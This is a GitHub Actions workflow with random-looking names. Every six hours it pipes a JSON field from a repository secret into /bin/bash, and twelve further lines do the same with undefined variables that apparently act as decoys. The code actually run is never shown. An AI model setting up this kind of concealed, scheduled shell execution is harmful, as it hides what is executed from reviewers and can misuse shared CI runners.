name: mingrixiu2345

on:
  workflow_dispatch:
  schedule:
    - cron: '36 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mingrixiu2345
        env:
          rnhue3: ${{ secrets.rnhue3 }}
        run: |
          echo $rnhue3 | jq -r .jnn139 | /bin/bash
          echo $tp8 | jq -r .ogvx67 | /bin/bash
          echo $d76 | jq -r .m08047 | /bin/bash
          echo $f99 | jq -r .ngrl577 | /bin/bash
          echo $mpti7 | jq -r .icsse231 | /bin/bash
          echo $j354 | jq -r .so85622 | /bin/bash
          echo $gi9887 | jq -r .mqe2507 | /bin/bash
          echo $sp8601 | jq -r .ofren22 | /bin/bash
          echo $ftj13 | jq -r .botc56 | /bin/bash
          echo $huaho33 | jq -r .knkd87 | /bin/bash
          echo $dtbi58 | jq -r .okjv4 | /bin/bash
          echo $cqqty01 | jq -r .b8736 | /bin/bash
          echo $qv79899 | jq -r .bxm264 | /bin/bash

